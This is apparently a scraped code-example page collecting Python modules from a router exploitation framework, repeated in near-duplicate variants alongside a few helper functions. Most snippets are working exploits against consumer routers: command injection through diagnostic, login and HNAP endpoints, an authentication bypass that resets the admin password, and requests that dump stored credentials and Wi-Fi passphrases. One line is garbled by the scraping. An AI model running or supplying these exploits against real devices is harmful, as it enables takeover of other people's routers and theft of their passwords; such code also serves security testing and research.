示例#1
0
    def do_run(self, e):
        url = "http://%s:%s/diagnostic.php" % (self.host, self.port)

        payload = {'act': 'ping', 'dst': '& %s&' % self.command}
        headers = {
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
        }
        try:
            print_yellow("Sending exploit")
            response = requests.post(url,
                                     headers=headers,
                                     data=payload,
                                     timeout=60)
            if "<report>OK</report>" in response.text:
                print_success("output not available this is blind injection")
            else:
                print_error(
                    "could not find marker in response, exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
示例#2
0
文件: io.py 项目: TamirAl/rext
def query_yes_no(question, default="yes"):
    """Ask a yes/no question via raw_input() and return their answer.

    "question" is a string that is presented to the user.
    "default" is the presumed answer if the user just hits <Enter>.
        It must be "yes" (the default), "no" or None (meaning
        an answer is required of the user).

    The "answer" return value is True for "yes" or False for "no".
    """
    valid = {"yes": True, "y": True, "ye": True,
             "no": False, "n": False}
    if default is None:
        prompt = " [y/n] "
    elif default == "yes":
        prompt = " [Y/n] "
    elif default == "no":
        prompt = " [y/N] "
    else:
        raise ValueError("invalid default answer: '%s'" % default)

    while True:
        print_yellow(question + prompt)
        choice = input().lower()
        if default is not None and choice == '':
            return valid[default]
        elif choice in valid:
            return valid[choice]
        else:
            print_red("Please respond with 'yes' or 'no' " "(or 'y' or 'n').\n")
示例#3
0
 def do_run(self, e):
     url = "http://%s:%s/login_handler.php" % (self.host, self.port)
     headers = {
         'Accept':
         'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
         'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
     }
     data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; echo "741852'
     try:
         response = requests.post(url=url,
                                  headers=headers,
                                  data=data,
                                  timeout=60)
         if "741852" in response.text:
             print_success("target is vulnerable")
             # Not so sure about quoting of commands that has arguments
             data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; %s' % self.command
             response = requests.post(url=url,
                                      headers=headers,
                                      data=data,
                                      timeout=60)
             print_green(response.text)
         elif "failure" in response.text:
             print_error("Exploit failed, target is probably patched")
             print_yellow(response.text)
     except requests.Timeout:
         print_error("exploit failed")
     except requests.ConnectionError:
         print_error("exploit failed")
示例#4
0
    def do_run(self, e):
        url = "http://%s:%s/command.php" % (self.host, self.port)

        payload = {'cmd': '%s; echo end' % self.command}
        headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                   'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
                   'Accept-Encoding': 'gzip, deflate',
                   'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
                   }
        try:
            print_yellow("Sending exploit")
            # Requests forces URI encoding and can't be turned off
            # so we have to prepare HTTP request manually and modify it with urllib.parse.quote before sending
            request = requests.Request('POST', url, headers=headers, data=payload)
            r = request.prepare()
            # print("Before modification:", r.body)
            r.body = urllib.parse.quote('cmd=%s; echo end' % self.command, safe='/=')
            r.headers.update({'Content-Length': len(r.body)})
            # print("After modification:", r.body)
            s = requests.Session()
            response = s.send(r, timeout=15)
            s.close()
            # This won't work
            # response = requests.post(url, headers=headers, data=payload, proxies=proxies, timeout=60)
            if "end" in response.text:  # end8758 is unique tag to search for in output
                print_success("output of %s:" % self.command)
                print_green(response.text)
            else:
                print_error("could not find marker in response, exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed or you killed httpd")
示例#5
0
    def do_run(self, e):
        url = "http://%s:%s/HNAP1" % (self.host, self.port)

        headers = {
            "SOAPAction":
            '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' %
            self.command
        }
        try:
            print_yellow("Sending exploit")
            requests.post(url, headers=headers, timeout=60)
            print_yellow(
                "HTTPd is still responding this is OK if you changed the payload"
            )
        except requests.ConnectionError:
            print_success("exploit sent.")
            answer = query_yes_no(
                "Do you wish to dump all system settings? (if telned was started)"
            )
            if answer is True:
                tn = telnetlib.Telnet(self.host, self.port)
                print_yellow("Sending command through telnet")
                tn.read_until(b'#', timeout=15)
                tn.write(b"xmldbc -d /var/config.xml; cat /var/config.xml\n")
                response = tn.read_until(b'#', timeout=15)
                tn.close()
                print_yellow("Writing response to config.xml")
                writetextfile(response.decode('ascii'), "config.xml")
                print_yellow(
                    "Don't forget to restart httpd or reboot the device")
        except requests.Timeout:
            print_error("timeout")
示例#6
0
文件: io.py 项目: moonmilker/rext
def query_yes_no(question, default="yes"):
    """Ask a yes/no question via raw_input() and return their answer.

    "question" is a string that is presented to the user.
    "default" is the presumed answer if the user just hits <Enter>.
        It must be "yes" (the default), "no" or None (meaning
        an answer is required of the user).

    The "answer" return value is True for "yes" or False for "no".
    """
    valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
    if default is None:
        prompt = " [y/n] "
    elif default == "yes":
        prompt = " [Y/n] "
    elif default == "no":
        prompt = " [y/N] "
    else:
        raise ValueError("invalid default answer: '%s'" % default)

    while True:
        print_yellow(question + prompt)
        choice = input().lower()
        if default is not None and choice == '':
            return valid[default]
        elif choice in valid:
            return valid[choice]
        else:
            print_red("Please respond with 'yes' or 'no' "
                      "(or 'y' or 'n').\n")
示例#7
0
    def do_run(self, e):
        url = "http://%s:%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" % (
            self.host, self.port)

        try:
            print_yellow("Sending exploit")
            response = requests.get(url, timeout=60)
            if response.status_code == 200 and 'name="admin_password1"' in response.text:
                print_success("target seems vulnerable")
                print_green(
                    "You can visit any page by adding ?NO_NEED_AUTH=1&AUTH_GROUP=0 to URL"
                )
                print_yellow("Changing admin password")
                headers = {
                    'Accept':
                    'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                    'Accept-Language':
                    'Accept-Language: en-us,en;q=0.5',
                    'Accept-Encoding':
                    'gzip, deflate',
                    'Content-Type':
                    'application/x-www-form-urlencoded;charset=utf-8'
                }
                payload = {
                    'NO_NEED_AUTH': 1,
                    'AUTH_GROUP': 0,
                    'ACTION_POST': 1,
                    'apply': 'Save+Settings',
                    'admin_name': 'admin',
                    'admin_password1': '%s' % self.password,
                    'admin_password2': '%s' % self.password,
                    'grap_auth_enable_h': 0,
                    'rt_ipaddr': '0.0.0.0'
                }
                url = "http://%s:%s/tools_admin.php" % (self.host, self.port)
                response = requests.post(url=url,
                                         headers=headers,
                                         data=payload,
                                         timeout=60)
                if response.status_code == 200:
                    print_success(
                        "password seems to be changed try to login with: %s" %
                        self.password)
                else:
                    print_error("password change failed")

            else:
                print_error("exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
示例#8
0
    def do_run(self, e):
        url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port)

        try:
            print_yellow("Sending exploit")
            response = requests.get(url, timeout=60)
            if response.status_code == 200 and "<center>" in response.text:
                print_success("credentials fetched")
                credentials = re.findall("<center>\n\t\t\t(.*)", response.text)
                print(credentials[0])
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
示例#9
0
    def do_run(self, e):
        url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port)

        try:
            print_yellow("Sending exploit")
            response = requests.get(url, timeout=60)
            if response.status_code == 200 and "<center>" in response.text:
                print_success("credentials fetched")
                credentials = re.findall("<center>\n\t\t\t(.*)", response.text)
                print_green(credentials[0])
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
示例#10
0
    def do_run(self, e):
        target = "http://" + self.host + ":" + self.port
        try:
            response = requests.get(target, timeout=60)
            if response.status_code == requests.codes.unauthorized:
                print_yellow("Password protection detected")
                for i in range(0, 3):
                    time.sleep(1)
                    requests.get(target+"/BRS_netgear_success.html", timeout=60)
                response = requests.get(target, timeout=60)
                if response.status_code == requests.codes.ok:
                    print_success("bypass successful. Now use your browser to have at look at the admin interface.")

        except requests.RequestException:
            print_error("timeout!")
示例#11
0
 def do_run(self, e):
     if self.ssl is False:
         url = "http://%s:%s" % (self.host, self.port)
     else:
         url = "https://%s:%s" % (self.host, self.port)
     try:
         print_yellow("Sending GET request")
         response = requests.get(url, timeout=60, verify=False)
         print_green("[%s %s] %s" % (response.status_code, response.reason, response.url))
         for header in response.headers:
             print_green("%s: %s" % (header, response.headers.get(header)))
         if self.body is True:
             print("\n")
             print_green(response.text)
     except requests.ConnectionError as e:
         print_error("connection error %s" % e)
     except requests.Timeout:
         print_error("timeout")
示例#12
0
    def do_run(self, e):
        target = "http://" + self.host + ":" + self.port
        try:
            response = requests.get(target, timeout=60)
            if response.status_code == requests.codes.unauthorized:
                print_yellow("Password protection detected")
                for i in range(0, 3):
                    time.sleep(1)
                    requests.get(target + "/BRS_netgear_success.html",
                                 timeout=60)
                response = requests.get(target, timeout=60)
                if response.status_code == requests.codes.ok:
                    print_success(
                        "bypass successful. Now use your browser to have at look at the admin interface."
                    )

        except requests.RequestException:
            print_error("timeout!")
示例#13
0
文件: http_ping.py 项目: TamirAl/rext
 def do_run(self, e):
     if self.ssl is False:
         url = "http://%s:%s" % (self.host, self.port)
     else:
         url = "https://%s:%s" % (self.host, self.port)
     try:
         print_yellow("Sending GET request")
         response = requests.get(url, timeout=60, verify=False)
         print_green("[%s %s] %s" % (response.status_code, response.reason, response.url))
         for header in response.headers:
             print_green("%s: %s" % (header, response.headers.get(header)))
         if self.body is True:
             print("\n")
             print_green(response.text)
     except requests.ConnectionError as e:
         print_error("connection error %s" % e)
     except requests.Timeout:
         print_error("timeout")
示例#14
0
    def do_run(self, e):
        url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port)

        try:
            print_yellow("Sending exploit")
            # It took me longer than necessary to find out how to use Content-Disposition properly
            # Always set stream=True otherwise you may not get the whole file
            response = requests.post(url, files={'config': ''}, timeout=60, stream=True)
            if response.status_code == 200:
                if response.headers.get('Content-Disposition'):
                    print_success("got file in response")
                    print_yellow("Writing file to config.bin")
                    core.io.writefile(response.content, "config.bin")
                    print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML")
        except requests.ConnectionError as e:
            print_error("connection error %s" % e)
        except requests.Timeout:
            print_error("timeout")
示例#15
0
    def do_run(self, e):
        url = "http://%s:%s/command.php" % (self.host, self.port)

        payload = {'cmd': '%s; echo end' % self.command}
        headers = {
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
        }
        try:
            print_yellow("Sending exploit")
            # Requests forces URI encoding and can't be turned off
            # so we have to prepare HTTP request manually and modify it with urllib.parse.quote before sending
            request = requests.Request('POST',
                                       url,
                                       headers=headers,
                                       data=payload)
            r = request.prepare()
            # print("Before modification:", r.body)
            r.body = urllib.parse.quote('cmd=%s; echo end' % self.command,
                                        safe='/=')
            r.headers.update({'Content-Length': len(r.body)})
            # print("After modification:", r.body)
            s = requests.Session()
            response = s.send(r, timeout=15)
            s.close()
            # This won't work
            # response = requests.post(url, headers=headers, data=payload, proxies=proxies, timeout=60)
            if "end" in response.text:  # end8758 is unique tag to search for in output
                print_success("output of %s:" % self.command)
                print_green(response.text)
            else:
                print_error(
                    "could not find marker in response, exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed or you killed httpd")
示例#16
0
    def do_run(self, e):
        url = "http://%s:%s/HNAP1" % (self.host, self.port)

        headers = {"SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % self.command}
        try:
            print_yellow("Sending exploit")
            requests.post(url, headers=headers, timeout=60)
            print_yellow("HTTPd is still responding this is OK if you changed the payload")
        except requests.ConnectionError:
            print_success("exploit sent.")
            answer = query_yes_no("Do you wish to dump all system settings? (if telned was started)")
            if answer is True:
                tn = telnetlib.Telnet(self.host, self.port)
                print_yellow("Sending command through telnet")
                tn.read_until(b'#', timeout=15)
                tn.write(b"xmldbc -d /var/config.xml; cat /var/config.xml\n")
                response = tn.read_until(b'#', timeout=15)
                tn.close()
                print_yellow("Writing response to config.xml")
                writetextfile(response.decode('ascii'), "config.xml")
                print_yellow("Don't forget to restart httpd or reboot the device")
        except requests.Timeout:
            print_error("timeout")
示例#17
0
    def do_run(self, e):
        url = "http://%s:%s/getcfg.php" % (self.host, self.port)

        payload = {'SERVICES': 'DEVICE.ACCOUNT'}
        headers = {
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
        }
        try:
            print_yellow("Sending exploit")
            response = requests.post(url,
                                     headers=headers,
                                     data=payload,
                                     timeout=60)
            if "<service>DEVICE.ACCOUNT</service>" in response.text:
                usernames = re.findall("<name>(.*)</name>", response.text)
                passwords = re.findall("<password>(.*)</password>",
                                       response.text)

                if "==OoXxGgYy==" in passwords:
                    print_error(
                        "Exploit failed, router responded with default value ==OoXxGgYy=="
                    )
                else:
                    print_success("")
                    for i in range(len(usernames)):
                        print_green("Username: "******"Password: "******"Exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
示例#18
0
    def do_run(self, e):
        url = "http://%s:%s/hidden_info.html" % (self.host, self.port)

        try:
            print_yellow("Sending exploit")
            response = requests.get(url, timeout=60)
            if "Manufacture Information" in response.text:
                print_success(
                    "information obtained, writing response into hidden_info.html"
                )
                core.io.writetextfile(response.text, "hidden_info.html")
                print_green(
                    "Please check file, response seems to depend on FW version, parsing may not be accurate"
                )
                value = re.findall("str =\(\"\[\{(.*)\}", response.text)
                value = value[0].split(',')
                for i in value:
                    print_green(i)
            else:
                print_error("exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
示例#19
0
 def de_cfg(self, data):
     """Get raw config data from raw /compressed/encrypted & comressed"""
     g = self.smart_guess(data)
     if g == self.CFG_RAW:
         print_yellow('File is  :\tnot compressed, not encrypted')
         return g, data
     elif g == self.CFG_LZO:
         print_yellow('File is  :\tcompressed, not encrypted')
         return g, self.decompress_cfg(data)
     elif g == self.CFG_ENC:
         print_yellow('File is  :\tcompressed, encrypted')
         return g, self.decompress_cfg(self.decrypt_cfg(data))
示例#20
0
 def de_cfg(self, data):
     """Get raw config data from raw /compressed/encrypted & comressed"""
     g = self.smart_guess(data)
     if g == self.CFG_RAW:
         print_yellow('File is  :\tnot compressed, not encrypted')
         return g, data
     elif g == self.CFG_LZO:
         print_yellow('File is  :\tcompressed, not encrypted')
         return g, self.decompress_cfg(data)
     elif g == self.CFG_ENC:
         print_yellow('File is  :\tcompressed, encrypted')
         return g, self.decompress_cfg(self.decrypt_cfg(data))
示例#21
0
 def do_run(self, e):
     file = ""
     for file in self.files:
         print_yellow("Testing file: " + file)
         url = "http://%s:%s/%s?writeData=true&reginfo=0&macAddress= 001122334455 -c 0 ;" \
               "%s; echo #" % (self.host, self.port, file, "sleep 10")
         try:
             print_yellow("Doing timebased check with sleep 10")
             time_start = datetime.datetime.now()
             response = requests.get(url=url, timeout=60)
             time_end = datetime.datetime.now()
             delta = time_end - time_start
             if response.status_code == 200 and "Update Success!" in response.text:
                 if 13 > delta.seconds > 9:
                     print_green(
                         "Timebased check OK target should be vulnerable")
                 else:
                     print_yellow(
                         "Timebased check failed, but target still might be vulnerable"
                     )
                 break
         except requests.Timeout:
             print_error("timeout")
         except requests.ConnectionError:
             print_error("exploit failed")
     print_green("Vulnerable file:" + file)
     print_yellow("Sending command")
     url = "http://%s:%s/%s?writeData=true&reginfo=0&macAddress= 001122334455 -c 0 ;" \
           "%s; echo #" % (self.host, self.port, file, self.command)
     try:
         response = requests.get(url=url, timeout=60)
         if response.status_code == 200 and "Update Success!" in response.text:
             print_success("command sent")
     except requests.Timeout:
         print_error("timeout")
     except requests.ConnectionError:
         print_error(
             "target stopped responding or you issued reboot or killed lighttpd"
         )
示例#22
0
    def do_run(self, e):
        url = "http://%s:%s/" % (self.host, self.port)

        # Headers with SOAP requests
        headers = {"SOAPAction": "urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo"}
        headers1 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo"}
        headers2 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo"}
        headers3 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys"}
        headers4 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetAttachDevice"}

        payload = {"": ""}  # Empty form will cause that the auth is bypassed

        # This is a very stupid way to parse XML but xml.etree is not playing nice with SOAP and
        # I don't feel like adding lxml into dependencies just for this module
        striptag = re.compile(r"<.*?>")
        try:
            print_yellow("Sending exploit")

            # Request DeviceInfo
            response = requests.post(url, headers=headers, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to DeviceInfo.xml")
            core.io.writetextfile(response.text, "DeviceInfo.xml")
            print_yellow("Parsing response")
            regex = re.search("<Description>(.*)", response.text)
            regex2 = re.search("<SerialNumber>(.*)", response.text)
            regex3 = re.search("<Firmwareversion>(.*)", response.text)
            try:
                description = striptag.sub("", regex.group(1))
                serial_number = striptag.sub("", regex2.group(1))
                firmware = striptag.sub("", regex3.group(1))
                print_green("Device: %s" % description)
                print_green("Serial number: %s" % serial_number)
                print_green("FW version: %s" % firmware)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Request web UI password
            response = requests.post(url, headers=headers1, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to LANConfigSecurity.xml")
            core.io.writetextfile(response.text, "LANConfigSecurity.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewPassword>(.*)", response.text)
            try:
                password = striptag.sub("", regex.group(1))
                print_green("Password: %s" % password)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Request WLAN info
            response = requests.post(url, headers=headers2, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to WLANConfiguration.xml")
            core.io.writetextfile(response.text, "WLANConfiguration.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewSSID>(.*)", response.text)
            regex2 = re.search("<NewBasicEncryptionModes>(.*)", response.text)
            try:
                ssid = regex.group(1)
                ssid = striptag.sub("", ssid)
                wlan_encryption = striptag.sub("", regex2.group(1))
                print_green("SSID: " + ssid)
                print_green("Encryption: %s" % wlan_encryption)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Wlan password
            response = requests.post(url, headers=headers3, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to WLANConfigurationGetWPASecurityKeys.xml")
            core.io.writetextfile(response.text, "WLANConfigurationGetWPASecurityKeys.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewWPAPassphrase>(.*)", response.text)
            try:
                wlan_password = striptag.sub("", regex.group(1))
                print_green("Passphrase: %s" % wlan_password)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Attached devices
            response = requests.post(url, headers=headers4, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to DeviceInfoGetAttachDevice.xml")
            core.io.writetextfile(response.text, "DeviceInfoGetAttachDevice.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewAttachDevice>(.*)", response.text)
            try:
                devices = striptag.sub("", regex.group(1))
                devices = devices.split("@")[1:]  # First element is number of records
                for device in devices:
                    device = device.split(";")
                    print_green("ID: %s" % device[0])
                    print_green("IP: %s" % device[1])
                    print_green("Name: %s" % device[2])
                    print_green("MAC: %s" % interface.utils.lookup_mac(device[3]))
                    print_green("Connection type: %s" % device[4])
            except IndexError:
                print_error("opps unable to locate this regular expression")

        except requests.ConnectionError as e:
            print_error("lost connection " + e)
        except requests.Timeout:
            print_error("timeout")
示例#23
0
    def do_run(self, e):
        print_warning("Sending payload sysinfo")
        result = self.send_payload("sysinfo.cgi")
        if result:
            print_success("Got system information, writing to file")
            core.io.writetextfile(result, "sysinfo")
            print_info("Analyzing sysinfo...")
            regex = re.search("device::default_passphrase=(.*)", result)
            if regex:
                try:
                    print_green("Default admin passphrasse: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate passphrasse")

            regex = re.search("device::mac_addr=(.*)", result)
            if regex:
                try:
                    print_green("MAC: " + regex.group(1) +
                                lookup_mac(regex.group(1)))
                except IndexError:
                    print_error("Unable to locate MAC")
            regex = re.search("device::default_ssid=(.*)", result)
            if regex:
                try:
                    print_green("Default SSID:: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate default SSID")
            regex = re.search("device::wps_pin=(.*)", result)
            if regex:
                try:
                    print_green("WPS Pin: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate WPS pin")
            regex = re.search("wl0_ssid=(.*)", result)
            if regex:
                try:
                    print_green("SSID: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate SSID")
            regex = re.search("wl0_passphrase=(.*)", result)
            if regex:
                try:
                    print_green("Passphrase: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate passphrase")
            regex = re.search("wl1_ssid=(.*)", result)
            if regex:
                try:
                    print_green("SSID: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate SSID")
            regex = re.search("wl1_passphrase=(.*)", result)
            if regex:
                try:
                    print_green("Passphrase: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate passphrase")
        print_yellow("Sending payload getstinfo")
        result = self.send_payload("getstinfo.cgi")
        if result:
            print_success("Got SSID hash and passphrase hash, writing to file")
            core.io.writetextfile(result, "getstinfo")
            print_success(result)
示例#24
0
    def do_run(self, e):
        print_yellow("Sending payload sysinfo")
        result = self.send_payload("sysinfo.cgi")
        if result:
            print_green("Got system information, writing to file")
            core.io.writetextfile(result, "sysinfo")
            print_green("Analyzing sysinfo...")
            regex = re.search("device::default_passphrase=(.*)", result)
            if regex:
                try:
                    print_green("Default admin passphrasse: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate passphrasse")

            regex = re.search("device::mac_addr=(.*)", result)
            if regex:
                try:
                    print_green("MAC: " + regex.group(1) + lookup_mac(regex.group(1)))
                except IndexError:
                    print_error("Unable to locate MAC")
            regex = re.search("device::default_ssid=(.*)", result)
            if regex:
                try:
                    print_green("Default SSID:: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate default SSID")
            regex = re.search("device::wps_pin=(.*)", result)
            if regex:
                try:
                    print_green("WPS Pin: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate WPS pin")
            regex = re.search("wl0_ssid=(.*)", result)
            if regex:
                try:
                    print_green("SSID: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate SSID")
            regex = re.search("wl0_passphrase=(.*)", result)
            if regex:
                try:
                    print_green("Passphrase: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate passphrase")
            regex = re.search("wl1_ssid=(.*)", result)
            if regex:
                try:
                    print_green("SSID: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate SSID")
            regex = re.search("wl1_passphrase=(.*)", result)
            if regex:
                try:
                    print_green("Passphrase: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate passphrase")
        print_yellow("Sending payload getstinfo")
        result = self.send_payload("getstinfo.cgi")
        if result:
            print_green("Got SSID hash and passphrase hash, writing to file")
            core.io.writetextfile(result, "getstinfo")
            print_green(result)
示例#25
0
    def do_run(self, e):
        url = "http://%s:%s/" % (self.host, self.port)

        # Headers with SOAP requests
        headers = {
            "SOAPAction": "urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo"
        }
        headers1 = {
            "SOAPAction":
            "urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo"
        }
        headers2 = {
            "SOAPAction":
            "urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo"
        }
        headers3 = {
            "SOAPAction":
            "urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys"
        }
        headers4 = {
            "SOAPAction":
            "urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetAttachDevice"
        }

        payload = {"": ""}  # Empty form will cause that the auth is bypassed

        # This is a very stupid way to parse XML but xml.etree is not playing nice with SOAP and
        # I don't feel like adding lxml into dependencies just for this module
        striptag = re.compile(r'<.*?>')
        try:
            print_yellow("Sending exploit")

            # Request DeviceInfo
            response = requests.post(url,
                                     headers=headers,
                                     data=payload,
                                     timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to DeviceInfo.xml")
            core.io.writetextfile(response.text, "DeviceInfo.xml")
            print_yellow("Parsing response")
            regex = re.search("<Description>(.*)", response.text)
            regex2 = re.search("<SerialNumber>(.*)", response.text)
            regex3 = re.search("<Firmwareversion>(.*)", response.text)
            try:
                description = striptag.sub('', regex.group(1))
                serial_number = striptag.sub('', regex2.group(1))
                firmware = striptag.sub('', regex3.group(1))
                print_green("Device: %s" % description)
                print_green("Serial number: %s" % serial_number)
                print_green("FW version: %s" % firmware)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Request web UI password
            response = requests.post(url,
                                     headers=headers1,
                                     data=payload,
                                     timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to LANConfigSecurity.xml")
            core.io.writetextfile(response.text, "LANConfigSecurity.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewPassword>(.*)", response.text)
            try:
                password = striptag.sub('', regex.group(1))
                print_green("Password: %s" % password)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Request WLAN info
            response = requests.post(url,
                                     headers=headers2,
                                     data=payload,
                                     timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to WLANConfiguration.xml")
            core.io.writetextfile(response.text, "WLANConfiguration.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewSSID>(.*)", response.text)
            regex2 = re.search("<NewBasicEncryptionModes>(.*)", response.text)
            try:
                ssid = regex.group(1)
                ssid = striptag.sub('', ssid)
                wlan_encryption = striptag.sub('', regex2.group(1))
                print_green("SSID: " + ssid)
                print_green("Encryption: %s" % wlan_encryption)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Wlan password
            response = requests.post(url,
                                     headers=headers3,
                                     data=payload,
                                     timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow(
                "Writing response to WLANConfigurationGetWPASecurityKeys.xml")
            core.io.writetextfile(response.text,
                                  "WLANConfigurationGetWPASecurityKeys.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewWPAPassphrase>(.*)", response.text)
            try:
                wlan_password = striptag.sub('', regex.group(1))
                print_green("Passphrase: %s" % wlan_password)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Attached devices
            response = requests.post(url,
                                     headers=headers4,
                                     data=payload,
                                     timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to DeviceInfoGetAttachDevice.xml")
            core.io.writetextfile(response.text,
                                  "DeviceInfoGetAttachDevice.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewAttachDevice>(.*)", response.text)
            try:
                devices = striptag.sub('', regex.group(1))
                devices = devices.split('@')[
                    1:]  # First element is number of records
                for device in devices:
                    device = device.split(";")
                    print_green("ID: %s" % device[0])
                    print_green("IP: %s" % device[1])
                    print_green("Name: %s" % device[2])
                    print_green("MAC: %s" %
                                interface.utils.lookup_mac(device[3]))
                    print_green("Connection type: %s" % device[4])
            except IndexError:
                print_error("opps unable to locate this regular expression")

        except requests.ConnectionError as e:
            print_error("lost connection " + e)
        except requests.Timeout:
            print_error("timeout")